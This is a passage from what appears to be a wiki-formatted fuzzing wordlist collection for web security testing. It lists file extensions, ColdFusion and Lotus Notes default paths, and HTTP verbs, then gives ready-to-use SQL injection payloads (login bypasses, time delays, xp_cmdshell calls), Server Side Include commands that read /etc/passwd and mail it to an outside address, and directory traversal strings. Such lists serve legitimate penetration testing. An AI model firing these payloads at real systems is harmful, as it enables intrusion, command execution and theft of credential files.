.puz&lt;br /&gt;
.pwa&lt;br /&gt;
.qda&lt;br /&gt;
.r0&lt;br /&gt;
.r00&lt;br /&gt;
.r01&lt;br /&gt;
.r02&lt;br /&gt;
.r03&lt;br /&gt;
.r1&lt;br /&gt;
.r2&lt;br /&gt;
.r30&lt;br /&gt;
.rar&lt;br /&gt;
.rev&lt;br /&gt;
.rk&lt;br /&gt;
.rnc&lt;br /&gt;
.rp9&lt;br /&gt;
.rpm&lt;br /&gt;
.rte&lt;br /&gt;
.rz&lt;br /&gt;
.rzs&lt;br /&gt;
.s00&lt;br /&gt;
.s01&lt;br /&gt;
.s02&lt;br /&gt;
.s7z&lt;br /&gt;
.sar&lt;br /&gt;
.sdc&lt;br /&gt;
.sdn&lt;br /&gt;
.sea&lt;br /&gt;
.sen&lt;br /&gt;
.sfs&lt;br /&gt;
.sfx&lt;br /&gt;
.sh&lt;br /&gt;
.shar&lt;br /&gt;
.shk&lt;br /&gt;
.shr&lt;br /&gt;
.sit&lt;br /&gt;
.sitx&lt;br /&gt;
.spt&lt;br /&gt;
.sqx&lt;br /&gt;
.sqz&lt;br /&gt;
.tar&lt;br /&gt;
.tar.gz&lt;br /&gt;
.tar.xz&lt;br /&gt;
.taz&lt;br /&gt;
.tbz&lt;br /&gt;
.tbz2&lt;br /&gt;
.tg&lt;br /&gt;
.tgz&lt;br /&gt;
.tlz&lt;br /&gt;
.tlzma&lt;br /&gt;
.txz&lt;br /&gt;
.tz&lt;br /&gt;
.uc2&lt;br /&gt;
.uha&lt;br /&gt;
.vem&lt;br /&gt;
.vsi&lt;br /&gt;
.wad&lt;br /&gt;
.war&lt;br /&gt;
.wot&lt;br /&gt;
.xef&lt;br /&gt;
.xez&lt;br /&gt;
.xmcdz&lt;br /&gt;
.xpi&lt;br /&gt;
.xx&lt;br /&gt;
.xz&lt;br /&gt;
.y&lt;br /&gt;
.yz&lt;br /&gt;
.z&lt;br /&gt;
.z01&lt;br /&gt;
.z02&lt;br /&gt;
.z03&lt;br /&gt;
.z04&lt;br /&gt;
.zap&lt;br /&gt;
.zfsendtotarget&lt;br /&gt;
.zip&lt;br /&gt;
.zipx&lt;br /&gt;
.zix&lt;br /&gt;
.zoo&lt;br /&gt;
.zpi&lt;br /&gt;
.zz&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Uncommon Data File Extensions  (Update: 16 March 2010 - Total Statements: 284) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# Uncommon Data File Extensions  (Update: 16 March 2010 - Total Statements: 284)&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# creative commons&lt;br /&gt;
&lt;br /&gt;
.3me&lt;br /&gt;
.3pe&lt;br /&gt;
.4dl&lt;br /&gt;
.8xk&lt;br /&gt;
.^^^&lt;br /&gt;
.aao&lt;br /&gt;
.ab2&lt;br /&gt;
.aca&lt;br /&gt;
.accdb&lt;br /&gt;
.acf&lt;br /&gt;
.acg&lt;br /&gt;
.agd&lt;br /&gt;
.an1&lt;br /&gt;
.anme&lt;br /&gt;
.arc&lt;br /&gt;
.arh&lt;br /&gt;
.ast&lt;br /&gt;
.att&lt;br /&gt;
.aw&lt;br /&gt;
.bafl&lt;br /&gt;
.bdf&lt;br /&gt;
.bfx&lt;br /&gt;
.bjo&lt;br /&gt;
.bld&lt;br /&gt;
.blg&lt;br /&gt;
.btf&lt;br /&gt;
.btif&lt;br /&gt;
.btr&lt;br /&gt;
.cct&lt;br /&gt;
.cdb&lt;br /&gt;
.cdd&lt;br /&gt;
.cdf&lt;br /&gt;
.cdp&lt;br /&gt;
.cdr&lt;br /&gt;
.chk&lt;br /&gt;
.ckd&lt;br /&gt;
.cl2&lt;br /&gt;
.cl4&lt;br /&gt;
.clb&lt;br /&gt;
.clix&lt;br /&gt;
.clm&lt;br /&gt;
.cmbl&lt;br /&gt;
.contact&lt;br /&gt;
.cpi&lt;br /&gt;
.cpmz&lt;br /&gt;
.csv&lt;br /&gt;
.cwz&lt;br /&gt;
.cxt&lt;br /&gt;
.daf&lt;br /&gt;
.dat&lt;br /&gt;
.data&lt;br /&gt;
.db&lt;br /&gt;
.dcf&lt;br /&gt;
.ddt&lt;br /&gt;
.dex&lt;br /&gt;
.dif&lt;br /&gt;
.dmsk&lt;br /&gt;
.dnc&lt;br /&gt;
.dpx&lt;br /&gt;
.dsd&lt;br /&gt;
.dt1&lt;br /&gt;
.dt2&lt;br /&gt;
.dta&lt;br /&gt;
.e00&lt;br /&gt;
.ec0&lt;br /&gt;
.edf&lt;br /&gt;
.eep&lt;br /&gt;
.efx&lt;br /&gt;
.enc&lt;br /&gt;
.enw&lt;br /&gt;
.epw&lt;br /&gt;
.est&lt;br /&gt;
.et&lt;br /&gt;
.eta&lt;br /&gt;
.ev3&lt;br /&gt;
.exif&lt;br /&gt;
.exp&lt;br /&gt;
.fbl&lt;br /&gt;
.fdb&lt;br /&gt;
.fid&lt;br /&gt;
.fol&lt;br /&gt;
.gdb&lt;br /&gt;
.gen&lt;br /&gt;
.gnp&lt;br /&gt;
.gpi&lt;br /&gt;
.gpx&lt;br /&gt;
.hcp&lt;br /&gt;
.hdf&lt;br /&gt;
.hmt&lt;br /&gt;
.hsk&lt;br /&gt;
.htg&lt;br /&gt;
.id2&lt;br /&gt;
.ii&lt;br /&gt;
.img&lt;br /&gt;
.ink&lt;br /&gt;
.ins&lt;br /&gt;
.irr&lt;br /&gt;
.irx&lt;br /&gt;
.iw&lt;br /&gt;
.jdb&lt;br /&gt;
.jnt&lt;br /&gt;
.job&lt;br /&gt;
.jrprint&lt;br /&gt;
.kmz&lt;br /&gt;
.lbx&lt;br /&gt;
.lex&lt;br /&gt;
.lgf&lt;br /&gt;
.lgl&lt;br /&gt;
.lib&lt;br /&gt;
.liveupdate&lt;br /&gt;
.lnt&lt;br /&gt;
.lst&lt;br /&gt;
.m&lt;br /&gt;
.masseffectprofile&lt;br /&gt;
.mat&lt;br /&gt;
.mbb&lt;br /&gt;
.mdb&lt;br /&gt;
.mem&lt;br /&gt;
.menc&lt;br /&gt;
.met&lt;br /&gt;
.mmf&lt;br /&gt;
.mng&lt;br /&gt;
.mpd&lt;br /&gt;
.mpp&lt;br /&gt;
.ms10&lt;br /&gt;
.muf&lt;br /&gt;
.mw&lt;br /&gt;
.mwf&lt;br /&gt;
.mwx&lt;br /&gt;
.nc&lt;br /&gt;
.ndx&lt;br /&gt;
.nfo&lt;br /&gt;
.not&lt;br /&gt;
.ns2&lt;br /&gt;
.ns3&lt;br /&gt;
.ns4&lt;br /&gt;
.ntx&lt;br /&gt;
.numbers&lt;br /&gt;
.ods&lt;br /&gt;
.oeaccount&lt;br /&gt;
.omcs&lt;br /&gt;
.or2&lt;br /&gt;
.or3&lt;br /&gt;
.or4&lt;br /&gt;
.or5&lt;br /&gt;
.orx&lt;br /&gt;
.out&lt;br /&gt;
.ov2&lt;br /&gt;
.ovf&lt;br /&gt;
.paf&lt;br /&gt;
.pbd&lt;br /&gt;
.pcr&lt;br /&gt;
.pdb&lt;br /&gt;
.pdx&lt;br /&gt;
.peb&lt;br /&gt;
.pec&lt;br /&gt;
.pfc&lt;br /&gt;
.pis&lt;br /&gt;
.pln&lt;br /&gt;
.pnpt&lt;br /&gt;
.pns&lt;br /&gt;
.pnt&lt;br /&gt;
.pos&lt;br /&gt;
.postal&lt;br /&gt;
.pps&lt;br /&gt;
.ppsx&lt;br /&gt;
.ppt&lt;br /&gt;
.pptm&lt;br /&gt;
.pptx&lt;br /&gt;
.pre&lt;br /&gt;
.prf&lt;br /&gt;
.psa&lt;br /&gt;
.psf&lt;br /&gt;
.pst&lt;br /&gt;
.ptz&lt;br /&gt;
.q07&lt;br /&gt;
.q3d&lt;br /&gt;
.qbw&lt;br /&gt;
.qdat&lt;br /&gt;
.qdf&lt;br /&gt;
.qfx&lt;br /&gt;
.qpf&lt;br /&gt;
.qpw&lt;br /&gt;
.qsd&lt;br /&gt;
.rcd&lt;br /&gt;
.rdx&lt;br /&gt;
.ref&lt;br /&gt;
.rmuf&lt;br /&gt;
.roi&lt;br /&gt;
.rrt&lt;br /&gt;
.rvt&lt;br /&gt;
.rwg&lt;br /&gt;
.saf&lt;br /&gt;
.sam07&lt;br /&gt;
.sbd&lt;br /&gt;
.sbf&lt;br /&gt;
.sbq&lt;br /&gt;
.sbt&lt;br /&gt;
.sdb&lt;br /&gt;
.sdc&lt;br /&gt;
.sdf&lt;br /&gt;
.sds&lt;br /&gt;
.ser&lt;br /&gt;
.sgn&lt;br /&gt;
.shs&lt;br /&gt;
.skc&lt;br /&gt;
.slk&lt;br /&gt;
.sonic&lt;br /&gt;
.soundpack&lt;br /&gt;
.spo&lt;br /&gt;
.sql&lt;br /&gt;
.stf&lt;br /&gt;
.stl&lt;br /&gt;
.stm&lt;br /&gt;
.sy3&lt;br /&gt;
.t08&lt;br /&gt;
.t09&lt;br /&gt;
.t2&lt;br /&gt;
.tax2009&lt;br /&gt;
.tdl&lt;br /&gt;
.tdt&lt;br /&gt;
.te&lt;br /&gt;
.teacher&lt;br /&gt;
.tmw&lt;br /&gt;
.tol&lt;br /&gt;
.trk&lt;br /&gt;
.trs&lt;br /&gt;
.trx&lt;br /&gt;
.tsv&lt;br /&gt;
.uccapilog&lt;br /&gt;
.ud&lt;br /&gt;
.udeb&lt;br /&gt;
.uds&lt;br /&gt;
.update&lt;br /&gt;
.uwl&lt;br /&gt;
.val&lt;br /&gt;
.vcf&lt;br /&gt;
.vdb&lt;br /&gt;
.vfs&lt;br /&gt;
.vip&lt;br /&gt;
.vle&lt;br /&gt;
.vlg&lt;br /&gt;
.vxml&lt;br /&gt;
.w02&lt;br /&gt;
.wab&lt;br /&gt;
.wb1&lt;br /&gt;
.wb3&lt;br /&gt;
.wdq&lt;br /&gt;
.wfd&lt;br /&gt;
.wfm&lt;br /&gt;
.windowslivecontact&lt;br /&gt;
.wk1&lt;br /&gt;
.wk2&lt;br /&gt;
.wk3&lt;br /&gt;
.wk4&lt;br /&gt;
.wk5&lt;br /&gt;
.wke&lt;br /&gt;
.wks&lt;br /&gt;
.wlmp&lt;br /&gt;
.wpc&lt;br /&gt;
.wpo&lt;br /&gt;
.wq1&lt;br /&gt;
.wq2&lt;br /&gt;
.wtr&lt;br /&gt;
.xbk&lt;br /&gt;
.xdb&lt;br /&gt;
.xds&lt;br /&gt;
.xfd&lt;br /&gt;
.xl&lt;br /&gt;
.xlgc&lt;br /&gt;
.xlr&lt;br /&gt;
.xls&lt;br /&gt;
.xlsx&lt;br /&gt;
.xltm&lt;br /&gt;
.xltx&lt;br /&gt;
.xml&lt;br /&gt;
.xmpz&lt;br /&gt;
.xsl&lt;br /&gt;
.xsn&lt;br /&gt;
.xtm&lt;br /&gt;
.xtp&lt;br /&gt;
.xxd&lt;br /&gt;
.{pb&lt;br /&gt;
.~hm&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cold Fusion Default Files - (Update: 16 March 2010 - Total Statements: 65) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#  Cold Fusion Default Files - (Update: 16 March 2010 - Total Statements: 65)&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# creative commons&lt;br /&gt;
&lt;br /&gt;
CFIDE/Administrator/&lt;br /&gt;
CFIDE/Administrator/index.cfm&lt;br /&gt;
CFIDE/Administrator/login.cfm&lt;br /&gt;
CFIDE/Administrator/Application.cfm&lt;br /&gt;
CFIDE/Application.cfm&lt;br /&gt;
CFIDE/adminapi/&lt;br /&gt;
CFIDE/adminapi/Application.cfm&lt;br /&gt;
CFIDE/adminapi/administrator.cfc&lt;br /&gt;
CFIDE/adminapi/base.cfc&lt;br /&gt;
CFIDE/adminapi/customtags/&lt;br /&gt;
CFIDE/adminapi/customtags/l10n.cfm&lt;br /&gt;
CFIDE/adminapi/customtags/resources&lt;br /&gt;
CFIDE/adminapi/customtags/resources/&lt;br /&gt;
CFIDE/adminapi/datasource.cfc&lt;br /&gt;
CFIDE/adminapi/debugging.cfc&lt;br /&gt;
CFIDE/adminapi/eventgateway.cfc&lt;br /&gt;
CFIDE/adminapi/extensions.cfc&lt;br /&gt;
CFIDE/adminapi/mail.cfc&lt;br /&gt;
CFIDE/adminapi/runtime.cfc&lt;br /&gt;
CFIDE/adminapi/security.cfc&lt;br /&gt;
CFIDE/adminapi/_datasource/&lt;br /&gt;
CFIDE/adminapi/_datasource/formatjdbcurl.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/getaccessdefaultsfromregistry.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/geturldefaults.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/setdsn.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/setmsaccessregistry.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/setsldatasource.cfm&lt;br /&gt;
CFIDE/classes/&lt;br /&gt;
CFIDE/classes/cf-j2re-win.cab&lt;br /&gt;
CFIDE/classes/cfapplets.jar&lt;br /&gt;
CFIDE/classes/images&lt;br /&gt;
CFIDE/componentutils/&lt;br /&gt;
CFIDE/componentutils/Application.cfm&lt;br /&gt;
CFIDE/componentutils/cfcexplorer.cfc&lt;br /&gt;
CFIDE/componentutils/cfcexplorer_utils.cfm&lt;br /&gt;
CFIDE/componentutils/componentdetail.cfm&lt;br /&gt;
CFIDE/componentutils/componentdoc.cfm&lt;br /&gt;
CFIDE/componentutils/componentlist.cfm&lt;br /&gt;
CFIDE/componentutils/gatewaymenu&lt;br /&gt;
CFIDE/componentutils/gatewaymenu/&lt;br /&gt;
CFIDE/componentutils/gatewaymenu/menu.cfc&lt;br /&gt;
CFIDE/componentutils/gatewaymenu/menunode.cfc&lt;br /&gt;
CFIDE/componentutils/login.cfm&lt;br /&gt;
CFIDE/componentutils/packagelist.cfm&lt;br /&gt;
CFIDE/componentutils/utils.cfc&lt;br /&gt;
CFIDE/componentutils/_component_cfcToHTML.cfm&lt;br /&gt;
CFIDE/componentutils/_component_cfcToMCDL.cfm?&lt;br /&gt;
CFIDE/componentutils/_component_style.cfm&lt;br /&gt;
CFIDE/componentutils/_component_utils.cfm&lt;br /&gt;
CFIDE/debug/&lt;br /&gt;
CFIDE/debug/images/&lt;br /&gt;
CFIDE/debug/includes/&lt;br /&gt;
CFIDE/images/&lt;br /&gt;
CFIDE/images/skins/&lt;br /&gt;
CFIDE/install.cfm&lt;br /&gt;
CFIDE/installers/&lt;br /&gt;
CFIDE/installers/CFMX7DreamWeaverExtensions.mxp&lt;br /&gt;
CFIDE/installers/CFReportBuilderInstaller.exe&lt;br /&gt;
CFIDE/probe.cfm&lt;br /&gt;
CFIDE/scripts/&lt;br /&gt;
CFIDE/scripts/css/&lt;br /&gt;
CFIDE/scripts/xsl/&lt;br /&gt;
CFIDE/wizards/&lt;br /&gt;
CFIDE/wizards/common/&lt;br /&gt;
CFIDE/wizards/common/utils.cfc&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== All HTTP Verbs Defined in RFC's + 1 ARBITRARY Verb - (Update: 16 March 2009 - Total Statements: 31)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#  ll HTTP Verbs Defined in RFC's + 1 ARBITRARY Verb - (Update: 16 March 2009 - Total Statements: 31)&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# creative commons&lt;br /&gt;
&lt;br /&gt;
OPTIONS&lt;br /&gt;
GET&lt;br /&gt;
HEAD&lt;br /&gt;
POST&lt;br /&gt;
PUT&lt;br /&gt;
DELETE&lt;br /&gt;
TRACE&lt;br /&gt;
CONNECT&lt;br /&gt;
PROPFIND&lt;br /&gt;
PROPPATCH&lt;br /&gt;
MKCOL&lt;br /&gt;
COPY&lt;br /&gt;
MOVE&lt;br /&gt;
LOCK&lt;br /&gt;
UNLOCK&lt;br /&gt;
VERSION-CONTROL&lt;br /&gt;
REPORT&lt;br /&gt;
CHECKOUT&lt;br /&gt;
CHECKIN&lt;br /&gt;
UNCHECKOUT&lt;br /&gt;
MKWORKSPACE&lt;br /&gt;
UPDATE&lt;br /&gt;
LABEL&lt;br /&gt;
MERGE&lt;br /&gt;
BASELINE-CONTROL&lt;br /&gt;
MKACTIVITY&lt;br /&gt;
ORDERPATCH&lt;br /&gt;
ACL&lt;br /&gt;
PATCH&lt;br /&gt;
SEARCH&lt;br /&gt;
ARBITRARY&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Lotus/Notes Files -(Update: 02 February 2010 - Total Statements: 111)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;/852566C90012664F&lt;br /&gt;
/admin4.nsf&lt;br /&gt;
/admin5.nsf&lt;br /&gt;
/admin.nsf&lt;br /&gt;
/agentrunner.nsf&lt;br /&gt;
/alog.nsf&lt;br /&gt;
/a_domlog.nsf&lt;br /&gt;
/bookmark.nsf&lt;br /&gt;
/busytime.nsf&lt;br /&gt;
/catalog.nsf&lt;br /&gt;
/certa.nsf&lt;br /&gt;
/certlog.nsf&lt;br /&gt;
/certsrv.nsf&lt;br /&gt;
/chatlog.nsf&lt;br /&gt;
/clbusy.nsf&lt;br /&gt;
/cldbdir.nsf&lt;br /&gt;
/clusta4.nsf&lt;br /&gt;
/collect4.nsf&lt;br /&gt;
/da.nsf&lt;br /&gt;
/dba4.nsf&lt;br /&gt;
/dclf.nsf&lt;br /&gt;
/DEASAppDesign.nsf&lt;br /&gt;
/DEASLog01.nsf&lt;br /&gt;
/DEASLog02.nsf&lt;br /&gt;
/DEASLog03.nsf&lt;br /&gt;
/DEASLog04.nsf&lt;br /&gt;
/DEASLog05.nsf&lt;br /&gt;
/DEASLog.nsf&lt;br /&gt;
/decsadm.nsf&lt;br /&gt;
/decslog.nsf&lt;br /&gt;
/DEESAdmin.nsf&lt;br /&gt;
/dirassist.nsf&lt;br /&gt;
/doladmin.nsf&lt;br /&gt;
/domadmin.nsf&lt;br /&gt;
/domcfg.nsf&lt;br /&gt;
/domguide.nsf&lt;br /&gt;
/domlog.nsf&lt;br /&gt;
/dspug.nsf&lt;br /&gt;
/events4.nsf&lt;br /&gt;
/events5.nsf&lt;br /&gt;
/events.nsf&lt;br /&gt;
/event.nsf&lt;br /&gt;
/homepage.nsf&lt;br /&gt;
/iNotes/Forms5.nsf/$DefaultNav&lt;br /&gt;
/jotter.nsf&lt;br /&gt;
/leiadm.nsf&lt;br /&gt;
/leilog.nsf&lt;br /&gt;
/leivlt.nsf&lt;br /&gt;
/log4a.nsf&lt;br /&gt;
/log.nsf&lt;br /&gt;
/l_domlog.nsf&lt;br /&gt;
/mab.nsf&lt;br /&gt;
/mail10.box&lt;br /&gt;
/mail1.box&lt;br /&gt;
/mail2.box&lt;br /&gt;
/mail3.box&lt;br /&gt;
/mail4.box&lt;br /&gt;
/mail5.box&lt;br /&gt;
/mail6.box&lt;br /&gt;
/mail7.box&lt;br /&gt;
/mail8.box&lt;br /&gt;
/mail9.box&lt;br /&gt;
/mail.box&lt;br /&gt;
/msdwda.nsf&lt;br /&gt;
/mtatbls.nsf&lt;br /&gt;
/mtstore.nsf&lt;br /&gt;
/names.nsf&lt;br /&gt;
/nntppost.nsf&lt;br /&gt;
/nntp/nd000001.nsf&lt;br /&gt;
/nntp/nd000002.nsf&lt;br /&gt;
/nntp/nd000003.nsf&lt;br /&gt;
/ntsync45.nsf&lt;br /&gt;
/perweb.nsf&lt;br /&gt;
/qpadmin.nsf&lt;br /&gt;
/quickplace/quickplace/main.nsf&lt;br /&gt;
/reports.nsf&lt;br /&gt;
/sample/siregw46.nsf&lt;br /&gt;
/schema50.nsf&lt;br /&gt;
/setupweb.nsf&lt;br /&gt;
/setup.nsf&lt;br /&gt;
/smbcfg.nsf&lt;br /&gt;
/smconf.nsf&lt;br /&gt;
/smency.nsf&lt;br /&gt;
/smhelp.nsf&lt;br /&gt;
/smmsg.nsf&lt;br /&gt;
/smquar.nsf&lt;br /&gt;
/smsolar.nsf&lt;br /&gt;
/smtime.nsf&lt;br /&gt;
/smtpibwq.nsf&lt;br /&gt;
/smtpobwq.nsf&lt;br /&gt;
/smtp.box&lt;br /&gt;
/smtp.nsf&lt;br /&gt;
/smvlog.nsf&lt;br /&gt;
/srvnam.htm&lt;br /&gt;
/statmail.nsf&lt;br /&gt;
/statrep.nsf&lt;br /&gt;
/stauths.nsf&lt;br /&gt;
/stautht.nsf&lt;br /&gt;
/stconfig.nsf&lt;br /&gt;
/stconf.nsf&lt;br /&gt;
/stdnaset.nsf&lt;br /&gt;
/stdomino.nsf&lt;br /&gt;
/stlog.nsf&lt;br /&gt;
/streg.nsf&lt;br /&gt;
/stsrc.nsf&lt;br /&gt;
/userreg.nsf&lt;br /&gt;
/vpuserinfo.nsf&lt;br /&gt;
/webadmin.nsf&lt;br /&gt;
/web.nsf&lt;br /&gt;
/.nsf/../winnt/win.ini&lt;br /&gt;
/?Open &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== SQL Injection -(Update: 11 August 2009 - Total Statements: 126)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;Statement&lt;br /&gt;
'sqlvuln&lt;br /&gt;
'+sqlvuln&lt;br /&gt;
sqlvuln;&lt;br /&gt;
(sqlvuln)&lt;br /&gt;
a' or 1=1--&lt;br /&gt;
&amp;quot;a&amp;quot;&amp;quot; or 1=1--&amp;quot;&lt;br /&gt;
 or a = a&lt;br /&gt;
a' or 'a' = 'a&lt;br /&gt;
1 or 1=1&lt;br /&gt;
a' waitfor delay '0:0:10'--&lt;br /&gt;
1 waitfor delay '0:0:10'--&lt;br /&gt;
declare @q nvarchar (4000) select @q =&lt;br /&gt;
0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A&lt;br /&gt;
0&lt;br /&gt;
031003000270000&lt;br /&gt;
declare @s varchar(22) select @s =&lt;br /&gt;
0x77616974666F722064656C61792027303A303A31302700 exec(@s)&lt;br /&gt;
0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)&lt;br /&gt;
declare @s varchar (8000) select @s = 0x73656c65637420404076657273696f6e&lt;br /&gt;
exec(@s)&lt;br /&gt;
a'&lt;br /&gt;
?&lt;br /&gt;
' or 1=1&lt;br /&gt;
‘ or 1=1 --&lt;br /&gt;
x' AND userid IS NULL; --&lt;br /&gt;
x' AND email IS NULL; --&lt;br /&gt;
anything' OR 'x'='x&lt;br /&gt;
x' AND 1=(SELECT COUNT(*) FROM tabname); --&lt;br /&gt;
x' AND members.email IS NULL; --&lt;br /&gt;
x' OR full_name LIKE '%Bob%&lt;br /&gt;
23 OR 1=1&lt;br /&gt;
'; exec master..xp_cmdshell 'ping 172.10.1.255'--&lt;br /&gt;
'&lt;br /&gt;
'%20or%20''='&lt;br /&gt;
'%20or%20'x'='x&lt;br /&gt;
%20or%20x=x&lt;br /&gt;
')%20or%20('x'='x&lt;br /&gt;
0 or 1=1&lt;br /&gt;
' or 0=0 --&lt;br /&gt;
&amp;quot; or 0=0 --&lt;br /&gt;
or 0=0 --&lt;br /&gt;
' or 0=0 #&lt;br /&gt;
 or 0=0 #&amp;quot;&lt;br /&gt;
or 0=0 #&lt;br /&gt;
' or 1=1--&lt;br /&gt;
&amp;quot; or 1=1--&lt;br /&gt;
' or '1'='1'--&lt;br /&gt;
' or 1 --'&lt;br /&gt;
or 1=1--&lt;br /&gt;
or%201=1&lt;br /&gt;
or%201=1 --&lt;br /&gt;
' or 1=1 or ''='&lt;br /&gt;
 or 1=1 or &amp;quot;&amp;quot;=&lt;br /&gt;
' or a=a--&lt;br /&gt;
 or a=a&lt;br /&gt;
') or ('a'='a&lt;br /&gt;
) or (a=a&lt;br /&gt;
hi or a=a&lt;br /&gt;
hi or 1=1 --&amp;quot;&lt;br /&gt;
hi' or 1=1 --&lt;br /&gt;
hi' or 'a'='a&lt;br /&gt;
hi') or ('a'='a&lt;br /&gt;
&amp;quot;hi&amp;quot;&amp;quot;) or (&amp;quot;&amp;quot;a&amp;quot;&amp;quot;=&amp;quot;&amp;quot;a&amp;quot;&lt;br /&gt;
'hi' or 'x'='x';&lt;br /&gt;
@variable&lt;br /&gt;
,@variable&lt;br /&gt;
PRINT&lt;br /&gt;
PRINT @@variable&lt;br /&gt;
select&lt;br /&gt;
insert&lt;br /&gt;
as&lt;br /&gt;
or&lt;br /&gt;
procedure&lt;br /&gt;
limit&lt;br /&gt;
order by&lt;br /&gt;
asc&lt;br /&gt;
desc&lt;br /&gt;
delete&lt;br /&gt;
update&lt;br /&gt;
distinct&lt;br /&gt;
having&lt;br /&gt;
truncate&lt;br /&gt;
replace&lt;br /&gt;
like&lt;br /&gt;
handler&lt;br /&gt;
bfilename&lt;br /&gt;
' or username like '%&lt;br /&gt;
' or uname like '%&lt;br /&gt;
' or userid like '%&lt;br /&gt;
' or uid like '%&lt;br /&gt;
' or user like '%&lt;br /&gt;
exec xp&lt;br /&gt;
exec sp&lt;br /&gt;
'; exec master..xp_cmdshell&lt;br /&gt;
'; exec xp_regread&lt;br /&gt;
t'exec master..xp_cmdshell 'nslookup www.google.com'--&lt;br /&gt;
--sp_password&lt;br /&gt;
\x27UNION SELECT&lt;br /&gt;
' UNION SELECT&lt;br /&gt;
' UNION ALL SELECT&lt;br /&gt;
' or (EXISTS)&lt;br /&gt;
' (select top 1&lt;br /&gt;
'||UTL_HTTP.REQUEST&lt;br /&gt;
1;SELECT%20*&lt;br /&gt;
to_timestamp_tz&lt;br /&gt;
tz_offset&lt;br /&gt;
&amp;amp;lt;&amp;amp;gt;&amp;quot;'%;)(&amp;amp;amp;+&lt;br /&gt;
'%20or%201=1&lt;br /&gt;
%27%20or%201=1&lt;br /&gt;
%20$(sleep%2050)&lt;br /&gt;
%20'sleep%2050'&lt;br /&gt;
char%4039%41%2b%40SELECT&lt;br /&gt;
&amp;amp;amp;apos;%20OR&lt;br /&gt;
'sqlattempt1&lt;br /&gt;
(sqlattempt2)&lt;br /&gt;
|&lt;br /&gt;
%7C&lt;br /&gt;
*|&lt;br /&gt;
%2A%7C&lt;br /&gt;
*(|(mail=*))&lt;br /&gt;
%2A%28%7C%28mail%3D%2A%29%29&lt;br /&gt;
*(|(objectclass=*))&lt;br /&gt;
%2A%28%7C%28objectclass%3D%2A%29%29&lt;br /&gt;
(&lt;br /&gt;
%28&lt;br /&gt;
)&lt;br /&gt;
%29&lt;br /&gt;
&amp;amp;amp;&lt;br /&gt;
%26&lt;br /&gt;
!&lt;br /&gt;
%21&lt;br /&gt;
' or 1=1 or ''='&lt;br /&gt;
' or ''='&lt;br /&gt;
x' or 1=1 or 'x'='y&lt;br /&gt;
/&lt;br /&gt;
//&lt;br /&gt;
//*&lt;br /&gt;
*/*&lt;br /&gt;
a' or 3=3--&lt;br /&gt;
&amp;quot;a&amp;quot;&amp;quot; or 3=3--&amp;quot;&lt;br /&gt;
' or 3=3&lt;br /&gt;
‘ or 3=3 --&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== SSI (Server Side Includes) - (Update: 30 July 2007 - Total Statements: 4)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# Some server side include statements&lt;br /&gt;
# Foobar@email.de&lt;br /&gt;
&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;/bin/ls /&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;cat /etc/passwd&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;find / -name *.* -print&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;mail Foobar@email.de &amp;amp;lt;mailto:Foobar@email.de&amp;amp;gt; &amp;amp;lt; cat /etc/passwd&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Directory Traversal - (Update: 11 August 2009 - Total Statements: 132)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;Statement&lt;br /&gt;
\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
